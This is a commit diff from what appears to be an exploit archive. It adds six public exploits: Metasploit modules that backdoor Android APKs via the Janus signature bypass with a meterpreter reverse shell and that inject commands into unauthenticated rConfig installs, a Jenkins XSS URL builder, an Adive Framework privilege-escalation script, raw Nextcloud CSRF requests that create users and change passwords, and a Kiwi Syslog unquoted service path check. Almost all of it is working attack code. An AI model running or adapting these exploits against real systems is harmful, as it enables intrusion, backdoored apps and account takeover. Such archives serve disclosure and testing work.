DB: 2019-11-09

6 changes to exploits/shellcodes SolarWinds Kiwi Syslog Server 8.3.52 - 'Kiwi Syslog Server' Unquoted Service Path Android Janus - APK Signature Bypass (Metasploit) rConfig - install Command Execution (Metasploit) Jenkins build-metrics plugin 1.3 - 'label' Cross-Site Scripting Adive Framework 2.0.7 - Privilege Escalation Nextcloud 17 - Cross-Site Request Forgery
2019-11-09 05:01:40 +00:00 · 2019-11-09 05:01:40 +00:00 · b6ed2c7176
commit b6ed2c7176
parent 4ec7754462
7 changed files with 758 additions and 0 deletions
--- a/exploits/android/local/47601.rb
+++ b/exploits/android/local/47601.rb
@ -0,0 +1,162 @@
 ##
 # This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 require 'msf/core/payload/apk'
 class MetasploitModule < Msf::Exploit::Local
  Rank = ManualRanking
  include Msf::Exploit::FileDropper
  include Msf::Post::File
  include Msf::Post::Android::Priv
  include Msf::Payload::Android
  def initialize(info={})
    super( update_info( info, {
      'Name'           => "Android Janus APK Signature bypass",
      'Description'    => %q{
        This module exploits CVE-2017-13156 in Android to install a payload into another
        application. The payload APK will have the same signature and can be installed
        as an update, preserving the existing data.
        The vulnerability was fixed in the 5th December 2017 security patch, and was
        additionally fixed by the APK Signature scheme v2, so only APKs signed with
        the v1 scheme are vulnerable.
        Payload handler is disabled, and a multi/handler must be started first.
      },
      'Author'         => [
        'GuardSquare', # discovery
        'V-E-O',       # proof of concept
        'timwr',       # metasploit module
        'h00die',      # metasploit module
      ],
      'References'     => [
        [ 'CVE', '2017-13156' ],
        [ 'URL', 'https://www.guardsquare.com/en/blog/new-android-vulnerability-allows-attackers-modify-apps-without-affecting-their-signatures' ],
        [ 'URL', 'https://github.com/V-E-O/PoC/tree/master/CVE-2017-13156' ],
      ],
      'DisclosureDate' => 'Jul 31 2017',
      'SessionTypes'   => [ 'meterpreter' ],
      'Platform'       => [ 'android' ],
      'Arch'           => [ ARCH_DALVIK ],
      'Targets'        => [ [ 'Automatic', {} ] ],
      'DefaultOptions' => {
        'PAYLOAD' => 'android/meterpreter/reverse_tcp',
        'AndroidWakelock' => false, # the target may not have the WAKE_LOCK permission
        'DisablePayloadHandler' => true,
      },
      'DefaultTarget'  => 0,
      'Notes' => {
        'SideEffects' => ['ARTIFACTS_ON_DISK', 'SCREEN_EFFECTS'],
        'Stability' => ['SERVICE_RESOURCE_LOSS'], # ZTE youtube app won't start anymore
      }
    }))
    register_options([
      OptString.new('PACKAGE', [true, 'The package to target, or ALL to attempt all', 'com.phonegap.camerasample']),
    ])
    register_advanced_options [
      OptBool.new('ForceExploit', [false, 'Override check result', false]),
    ]
  end
  def check
    os = cmd_exec("getprop ro.build.version.release")
    unless Gem::Version.new(os).between?(Gem::Version.new('5.1.1'), Gem::Version.new('8.0.0'))
      vprint_error "Android version #{os} is not vulnerable."
      return CheckCode::Safe
    end
    vprint_good "Android version #{os} appears to be vulnerable."
    patch = cmd_exec('getprop ro.build.version.security_patch')
    if patch.empty?
      print_status 'Unable to determine patch level.  Pre-5.0 this is unaccessible.'
    elsif patch > '2017-12-05'
      vprint_error "Android security patch level #{patch} is patched."
      return CheckCode::Safe
    else
      vprint_good "Android security patch level #{patch} is vulnerable"
    end
    CheckCode::Appears
  end
  def exploit
    def infect(apkfile)
      unless apkfile.start_with?("package:")
        fail_with Failure::BadConfig, 'Unable to locate app apk'
      end
      apkfile = apkfile[8..-1]
      print_status "Downloading APK: #{apkfile}"
      apk_data = read_file(apkfile)
      begin
        # Create an apk with the payload injected
        apk_backdoor = ::Msf::Payload::Apk.new
        apk_zip = apk_backdoor.backdoor_apk(nil, payload.encoded, false, false, apk_data, false)
        # Extract the classes.dex
        dex_data = ''
        Zip::File.open_buffer(apk_zip) do |zipfile|
          dex_data = zipfile.read("classes.dex")
        end
        dex_size = dex_data.length
        # Fix the original APKs zip file code directory
        cd_end_addr = apk_data.rindex("\x50\x4b\x05\x06")
        cd_start_addr = apk_data[cd_end_addr+16, cd_end_addr+20].unpack("V")[0]
        apk_data[cd_end_addr+16...cd_end_addr+20] = [ cd_start_addr+dex_size ].pack("V")
        pos = cd_start_addr
        while pos && pos < cd_end_addr
          offset = apk_data[pos+42, pos+46].unpack("V")[0]
          apk_data[pos+42...pos+46] = [ offset+dex_size ].pack("V")
          pos = apk_data.index("\x50\x4b\x01\x02", pos+46)
        end
        # Prepend the new classes.dex to the apk
        out_data = dex_data + apk_data
        out_data[32...36] = [ out_data.length ].pack("V")
        out_data = fix_dex_header(out_data)
        out_apk = "/sdcard/#{Rex::Text.rand_text_alphanumeric 6}.apk"
        print_status "Uploading APK: #{out_apk}"
        write_file(out_apk, out_data)
        register_file_for_cleanup(out_apk)
        print_status "APK uploaded"
        # Prompt the user to update the APK
        session.appapi.app_install(out_apk)
        print_status "User should now have a prompt to install an updated version of the app"
        true
      rescue => e
        print_error e.to_s
        false
      end
    end
    unless [CheckCode::Detected, CheckCode::Appears].include? check
      unless datastore['ForceExploit']
        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
      end
      print_warning 'Target does not appear to be vulnerable'
    end
    if datastore["PACKAGE"] == 'ALL'
      vprint_status('Finding installed packages (this can take a few minutes depending on list of installed packages)')
      apkfiles = []
      all = cmd_exec("pm list packages").split("\n")
      c = 1
      all.each do |package|
        package = package.split(':')[1]
        vprint_status("Attempting exploit of apk #{c}/#{all.length} for #{package}")
        c += 1
        next if ['com.metasploit.stage', # avoid injecting into ourself
                ].include? package # This was left on purpose to be expanded as need be for testing
        result = infect(cmd_exec("pm path #{package}"))
        break if result
      end
    else
      infect(cmd_exec("pm path #{datastore["PACKAGE"]}"))
    end
  end
 end
--- a/exploits/java/webapps/47598.py
+++ b/exploits/java/webapps/47598.py
@ -0,0 +1,44 @@
 # Exploit Title: Jenkins build-metrics plugin 1.3 - 'label' Cross-Site Scripting
 # Date: 2019-11-06
 # Exploit Author: vesche (Austin Jackson)
 # Vendor Homepage: https://plugins.jenkins.io/build-metrics
 # Version: Jenkins build-metrics plugin 1.3 and below
 # Tested on: Debian 10 (Buster), Jenkins 2.203 (latest 2019-11-05), and build-metrics 1.3
 # CVE: CVE-2019-10475
 # Write-up: https://github.com/vesche/CVE-2019-10475
 #!/usr/bin/env python
 import sys
 import argparse
 VULN_URL = '''{base_url}/plugin/build-metrics/getBuildStats?label={inject}&range=2&rangeUnits=Weeks&jobFilteringType=ALL&jobFilter=&nodeFilteringType=ALL&nodeFilter=&launcherFilteringType=ALL&launcherFilter=&causeFilteringType=ALL&causeFilter=&Jenkins-Crumb=4412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96&json=%7B%22label%22%3A+%22Search+Results%22%2C+%22range%22%3A+%222%22%2C+%22rangeUnits%22%3A+%22Weeks%22%2C+%22jobFilteringType%22%3A+%22ALL%22%2C+%22jobNameRegex%22%3A+%22%22%2C+%22jobFilter%22%3A+%22%22%2C+%22nodeFilteringType%22%3A+%22ALL%22%2C+%22nodeNameRegex%22%3A+%22%22%2C+%22nodeFilter%22%3A+%22%22%2C+%22launcherFilteringType%22%3A+%22ALL%22%2C+%22launcherNameRegex%22%3A+%22%22%2C+%22launcherFilter%22%3A+%22%22%2C+%22causeFilteringType%22%3A+%22ALL%22%2C+%22causeNameRegex%22%3A+%22%22%2C+%22causeFilter%22%3A+%22%22%2C+%22Jenkins-Crumb%22%3A+%224412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96%22%7D&Submit=Search'''
 def get_parser():
    parser = argparse.ArgumentParser(description='CVE-2019-10475')
    parser.add_argument('-p', '--port', help='port', default=80, type=int)
    parser.add_argument('-d', '--domain', help='domain', default='localhost', type=str)
    parser.add_argument('-i', '--inject', help='inject', default='<script>alert("CVE-2019-10475")</script>', type=str)
    return parser
 def main():
    parser = get_parser()
    args = vars(parser.parse_args())
    port = args['port']
    domain = args['domain']
    inject = args['inject']
    if port == 80:
        base_url = f'http://{domain}'
    elif port == 443:
        base_url = f'https://{domain}'
    else:
        base_url = f'http://{domain}:{port}'
    build_url = VULN_URL.format(base_url=base_url, inject=inject)
    print(build_url)
    return 0
 if __name__ == '__main__':
    sys.exit(main())
--- a/exploits/linux/remote/47602.rb
+++ b/exploits/linux/remote/47602.rb
@ -0,0 +1,114 @@
 ##
 # This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'rConfig install Command Execution',
      'Description'    => %q{
        This module exploits an unauthenticated command injection vulnerability
        in rConfig versions 3.9.2 and prior. The `install` directory is not
        automatically removed after installation, allowing unauthenticated users
        to execute arbitrary commands via the `ajaxServerSettingsChk.php` file
        as the web server user.
        This module has been tested successfully on rConfig version 3.9.2 on
        CentOS 7.7.1908 (x64).
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'mhaskar', # Discovery and exploit
          'bcoles'   # Metasploit
        ],
      'References'     =>
        [
          ['CVE', '2019-16662'],
          ['EDB', '47555'],
          ['URL', 'https://gist.github.com/mhaskar/ceb65fa4ca57c3cdccc1edfe2390902e'],
          ['URL', 'https://shells.systems/rconfig-v3-9-2-authenticated-and-unauthenticated-rce-cve-2019-16663-and-cve-2019-16662/']
        ],
      'Platform'       => %w[unix linux],
      'Arch'           => [ARCH_CMD, ARCH_X86, ARCH_X64],
      'Payload'        => {'BadChars' => "\x00\x0a\x0d\x26"},
      'Targets'        =>
        [
          ['Automatic (Unix In-Memory)',
            'Platform'       => 'unix',
            'Arch'           => ARCH_CMD,
            'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse'},
            'Type'           => :unix_memory
          ],
          ['Automatic (Linux Dropper)',
            'Platform'       => 'linux',
            'Arch'           => [ARCH_X86, ARCH_X64],
            'DefaultOptions' => {'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp'},
            'Type'           => :linux_dropper
          ]
        ],
      'Privileged'     => false,
      'DefaultOptions' => { 'SSL' => true, 'RPORT' => 443 },
      'DisclosureDate' => '2019-10-28',
      'DefaultTarget'  => 0))
    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path to rConfig install directory', '/install/'])
      ])
  end
  def check
    res = execute_command('id')
    unless res
      vprint_error 'Connection failed'
      return CheckCode::Unknown
    end
    if res.code == 404
      vprint_error 'Could not find install directory'
      return CheckCode::Safe
    end
    cmd_res = res.body.scan(%r{The root details provided have not passed: (.+?)<\\/}).flatten.first
    unless cmd_res
      return CheckCode::Safe
    end
    vprint_status "Response: #{cmd_res}"
    unless cmd_res.include?('uid=')
      return CheckCode::Detected
    end
    CheckCode::Vulnerable
  end
  def execute_command(cmd, opts = {})
    vprint_status "Executing command: #{cmd}"
    send_request_cgi({
      'uri' => normalize_uri(target_uri.path, '/lib/ajaxHandlers/ajaxServerSettingsChk.php'),
      'vars_get' => {'rootUname' => ";#{cmd} #"}
    }, 5)
  end
  def exploit
    unless [CheckCode::Detected, CheckCode::Vulnerable].include? check
      fail_with Failure::NotVulnerable, "#{peer} - Target is not vulnerable"
    end
    case target['Type']
    when :unix_memory
      execute_command(payload.encoded)
    when :linux_dropper
      execute_cmdstager(:linemax => 1_500)
    end
  end
 end
--- a/exploits/php/webapps/47600.py
+++ b/exploits/php/webapps/47600.py
@ -0,0 +1,82 @@
 # Exploit Title: Adive Framework 2.0.7 - Privilege Escalation
 # Date: 2019-08-02
 # Exploit Author: Pablo Santiago
 # Vendor Homepage: https://www.adive.es/
 # Software Link: https://github.com/ferdinandmartin/adive-php7
 # Version: 2.0.7
 # Tested on: Windows 10
 # CVE : CVE-2019-14347
 #Exploit
 import requests
 import sys
 session = requests.Session()
 http_proxy  = "http://127.0.0.1:8080"
 https_proxy = "https://127.0.0.1:8080"
 proxyDict = {
             "http"  : http_proxy,
             "https" : https_proxy
           }
 print('[*****************************************]')
 print('[ BYPASSING Adive Framework Version.2.0.5 ]')
 print('[*****************************************]''\n')
 print('[+]Login with the correct credentials:' '\n')
 user = input('[+]user:')
 password = input('[+]password:')
 print('\n')
 url = 'http://localhost/adive/admin/login'
 values = {'user': user,
          'password': password,
          }
 r = session.post(url, data=values, proxies=proxyDict)
 cookie = session.cookies.get_dict()['PHPSESSID']
 print('Your session cookie is:'+ cookie +'\n')
 host = sys.argv[1]
 print('Create the new user:')
 userName = input('[+]User:')
 userUsername = input('[+]UserName:')
 password = input('[+]Password:')
 password2 = input('[+]Confirm Password:')
 print('The possibles permission are: 1: Administrator, 2: Developer, 3:Editor')
 permission = input('[+]permission:')
 if (password == password2):
 #configure proxy burp
 #hacer el request para la creacion de usuario
 data = {
 'userName':userName,
 'userUsername':userUsername,
 'pass':password,
 'cpass':password2,
 'permission':permission,
 }
 headers= {
 'Cookie': 'PHPSESSID='+cookie
 }
 request = session.post(host+'/adive/admin/user/add', data=data,
 headers=headers, proxies=proxyDict)
 print('+--------------------------------------------------+')
 else:
 print ('Passwords dont match!!!')
 #PoC
 https://imgur.com/dUgLYi6
 https://hackpuntes.com/wp-content/uploads/2019/08/ex.gif
--- a/exploits/php/webapps/47603.txt
+++ b/exploits/php/webapps/47603.txt
@ -0,0 +1,314 @@
 # Exploit Title: Nextcloud 17 - Cross-Site Request Forgery
 # Date: 08.11.2019
 # Exploit Author: Ozer Goker
 # Vendor Homepage: https://nextcloud.com
 # Software Link: https://nextcloud.com/install/#instructions-server
 # Version: 17
 # CVE: N/A
 #Nextcloud offers the industry-leading, on-premises content collaboration
 platform.
 #Our technology combines the convenience and ease of use of consumer-grade
 solutions like Dropbox and Google Drive with the security, privacy and
 control business #needs.
 ##################################################################################################################################
 # CSRF1
 # Create Folder
 MKCOL /remote.php/dav/files/ogoker/test HTTP/1.1
 Host: 192.168.2.109
 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
 Firefox/68.0
 Accept: /
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 X-Requested-With: XMLHttpRequest
 requesttoken:
 NBxrV688w2KBVFx/Q+X7LsYUMGKGrj5PFNLDVe5R0bo=:ZXkTEoBkskmuOhU0NN2iab9welrLxlUkZqePH70zg/M=
 Connection: close
 Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp;
 oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t;
 __Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true;
 nc_username=ogoker; nc_token=BnzwpedGNoSh8RqQEcU7yAbb6O%2FQReCM;
 nc_session_id=6kkh1f4s3gu80pjk9iclagoqrp; redirect=1; testing=1
 ##################################################################################################################################
 # CSRF2
 # Delete Folder
 DELETE /remote.php/dav/files/ogoker/test HTTP/1.1
 Host: 192.168.2.109
 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
 Firefox/68.0
 Accept: /
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 X-Requested-With: XMLHttpRequest
 requesttoken:
 NBxrV688w2KBVFx/Q+X7LsYUMGKGrj5PFNLDVe5R0bo=:ZXkTEoBkskmuOhU0NN2iab9welrLxlUkZqePH70zg/M=
 Connection: close
 Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp;
 oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t;
 __Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true;
 nc_username=ogoker; nc_token=BnzwpedGNoSh8RqQEcU7yAbb6O%2FQReCM;
 nc_session_id=6kkh1f4s3gu80pjk9iclagoqrp; redirect=1; testing=1
 ##################################################################################################################################
 # CSRF3
 # Create User
 POST /ocs/v2.php/cloud/users HTTP/1.1
 Host: 192.168.2.109
 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
 Firefox/68.0
 Accept: application/json, text/plain, /
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Content-Type: application/json;charset=utf-8
 requesttoken:
 qmO6/Dw6+bFv8FXRaFdzbhhzcVHZIGBHtg5riOIp4es=:+wbCuRNiiJpAnhyaH28qKWEXO2mUSAssxHsnwrFLs6I=
 Content-Length: 129
 Connection: close
 Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp;
 oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t;
 __Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true;
 nc_username=ogoker; nc_token=BnzwpedGNoSh8RqQEcU7yAbb6O%2FQReCM;
 nc_session_id=6kkh1f4s3gu80pjk9iclagoqrp; redirect=1; testing=1
 {"userid":"test","password":"test1234","displayName":"","email":"","groups":[],"subadmin":[],"quota":"default","language":"en"}
 ##################################################################################################################################
 # CSRF4
 # Delete User
 DELETE /ocs/v2.php/cloud/users/test HTTP/1.1
 Host: 192.168.2.109
 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
 Firefox/68.0
 Accept: application/json, text/plain, /
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 requesttoken:
 qmO6/Dw6+bFv8FXRaFdzbhhzcVHZIGBHtg5riOIp4es=:+wbCuRNiiJpAnhyaH28qKWEXO2mUSAssxHsnwrFLs6I=
 Connection: close
 Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp;
 oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t;
 __Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true;
 nc_username=ogoker; nc_token=BnzwpedGNoSh8RqQEcU7yAbb6O%2FQReCM;
 nc_session_id=6kkh1f4s3gu80pjk9iclagoqrp; redirect=1; testing=1
 ##################################################################################################################################
 # CSRF5
 # Disable User
 PUT /ocs/v2.php/cloud/users/test/disable HTTP/1.1
 Host: 192.168.2.109
 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
 Firefox/68.0
 Accept: application/json, text/plain, /
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 requesttoken:
 3uInmrIiv0aGraTESlGJCzqadH5giusD5iZ/GZwxxEQ=:j4df3516zm2pw+2PPWnQTEP+PkYt4oBolFMzU89Tlg0=
 Connection: close
 Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp;
 oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t;
 __Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true;
 nc_username=ogoker; nc_token=BnzwpedGNoSh8RqQEcU7yAbb6O%2FQReCM;
 nc_session_id=6kkh1f4s3gu80pjk9iclagoqrp; redirect=1; testing=1
 Content-Length: 0
 ##################################################################################################################################
 # CSRF6
 # Enable User
 PUT /ocs/v2.php/cloud/users/test/enable HTTP/1.1
 Host: 192.168.2.109
 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
 Firefox/68.0
 Accept: application/json, text/plain, /
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 requesttoken:
 3uInmrIiv0aGraTESlGJCzqadH5giusD5iZ/GZwxxEQ=:j4df3516zm2pw+2PPWnQTEP+PkYt4oBolFMzU89Tlg0=
 Connection: close
 Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp;
 oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t;
 __Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true;
 nc_username=ogoker; nc_token=BnzwpedGNoSh8RqQEcU7yAbb6O%2FQReCM;
 nc_session_id=6kkh1f4s3gu80pjk9iclagoqrp; redirect=1; testing=1
 Content-Length: 0
 ##################################################################################################################################
 # CSRF7
 # Create Group
 POST /ocs/v2.php/cloud/groups HTTP/1.1
 Host: 192.168.2.109
 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
 Firefox/68.0
 Accept: application/json, text/plain, /
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Content-Type: application/json;charset=utf-8
 requesttoken:
 EjdL6QpK1LpIlTtWYWHqEa3p8UKwRqDbBraFa+WWRbE=:Q1IzrCUSpZFn+3IdFlmzVtSNu3r9LsuwdMPJIbb0F/g=
 Content-Length: 18
 Connection: close
 Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp;
 oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t;
 __Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true;
 redirect=1; testing=1
 {"groupid":"test"}
 ##################################################################################################################################
 # CSRF8
 # Delete Group
 DELETE /ocs/v2.php/cloud/groups/test HTTP/1.1
 Host: 192.168.2.109
 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
 Firefox/68.0
 Accept: application/json, text/plain, /
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 requesttoken:
 EjdL6QpK1LpIlTtWYWHqEa3p8UKwRqDbBraFa+WWRbE=:Q1IzrCUSpZFn+3IdFlmzVtSNu3r9LsuwdMPJIbb0F/g=
 Connection: close
 Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp;
 oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t;
 __Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true;
 redirect=1; testing=1
 ##################################################################################################################################
 # CSRF9
 # Change User Full Name
 PUT /settings/users/ogoker/settings HTTP/1.1
 Host: 192.168.2.109
 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
 Firefox/68.0
 Accept: application/json, text/javascript, /; q=0.01
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Content-Type: application/json
 requesttoken:
 nvnWCslz6So+9VRA8Vg8043tt1pf1wL/ysi2ak1J6es=:z5yuT+YrmAERmx0LhmBllPSJ/WISv2mUuL36IB4ru6I=
 OCS-APIREQUEST: true
 X-Requested-With: XMLHttpRequest
 Content-Length: 266
 Connection: close
 Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp;
 oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t;
 __Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true;
 redirect=1; testing=1
 {"displayname":"Ozer
 Goker","displaynameScope":"contacts","phone":"","phoneScope":"private","email":"","emailScope":"contacts","website":"","websiteScope":"private","twitter":"","twitterScope":"private","address":"","addressScope":"private","avatarScope":"contacts"}
 ##################################################################################################################################
 # CSRF10
 # Change User Email
 PUT /settings/users/ogoker/settings HTTP/1.1
 Host: 192.168.2.109
 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
 Firefox/68.0
 Accept: application/json, text/javascript, /; q=0.01
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Content-Type: application/json
 requesttoken:
 I+6bC+nRvx4TyTudd4pzZrOucr8qlgwe0YE3v13+fOw=:covjTsaJzjU8p3LWALIqIcrKOIdn/md1o/R79Q6cLqU=
 OCS-APIREQUEST: true
 X-Requested-With: XMLHttpRequest
 Content-Length: 271
 Connection: close
 Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp;
 oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t;
 __Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true;
 redirect=1; testing=1
 {"displayname":"ogoker","displaynameScope":"contacts","phone":"","phoneScope":"private","email":"test@test
 ","emailScope":"contacts","website":"","websiteScope":"private","twitter":"","twitterScope":"private","address":"","addressScope":"private","avatarScope":"contacts"}
 ##################################################################################################################################
 # CSRF11
 # Change Language
 PUT /ocs/v2.php/cloud/users/ogoker HTTP/1.1
 Host: 192.168.2.109
 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
 Firefox/68.0
 Accept: /
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Content-Type: application/x-www-form-urlencoded; charset=UTF-8
 requesttoken:
 mRN2MXrwRQuE/fuQ5PNtyp4ulgYRocB99vbydSi8i+E=:yHYOdFWoNCCrk7Lbk8s0jedK3D5cyasWhIO+P3ve2ag=
 OCS-APIREQUEST: true
 X-Requested-With: XMLHttpRequest
 Content-Length: 21
 Connection: close
 Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp;
 oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t;
 __Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true;
 redirect=1; testing=1
 key=language&value=tr
 ##################################################################################################################################
 # CSRF12
 # Change User Password
 POST /settings/personal/changepassword HTTP/1.1
 Host: 192.168.2.109
 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
 Firefox/68.0
 Accept: /
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Content-Type: application/x-www-form-urlencoded; charset=UTF-8
 requesttoken:
 0OhP82O7tEe/0gbwiEPrkFfuU9StyaiXNi0yqg02wT4=:gY03tkzjxWyQvE+7/3uy1y6KGezgocP8RFh+4F5Uk3c=
 OCS-APIREQUEST: true
 X-Requested-With: XMLHttpRequest
 Content-Length: 70
 Connection: close
 Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp;
 oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t;
 __Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true;
 redirect=1; testing=1
 oldpassword=abcd1234&newpassword=12345678&newpassword-clone=12345678
 ##################################################################################################################################
--- a/exploits/windows/local/47599.txt
+++ b/exploits/windows/local/47599.txt
@ -0,0 +1,36 @@
 # Exploit Title: SolarWinds Kiwi Syslog Server 8.3.52 - 'Kiwi Syslog Server' Unquoted Service Path
 # Date: 2019-11-08
 # Exploit Author: Carlos A Garcia R
 # Vendor Homepage: https://www.kiwisyslog.com/
 # Software Link: https://www.kiwisyslog.com/downloads
 # Version: 8.3.52
 # Tested on: Windows XP Professional Service Pack 3
 # Description:
 # SolarWinds Kiwi Syslog Server 8.3.52 is an affordable software to manage syslog messages, SNMP traps, and Windows event logs
 # PoC:
 # C:\>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
 Kiwi Syslog Server	Kiwi Syslog Server	C:\Archivos de programa\Syslogd\Syslogd_Service.exe	Auto
 # C:\>sc qc "Kiwi Syslog Server"
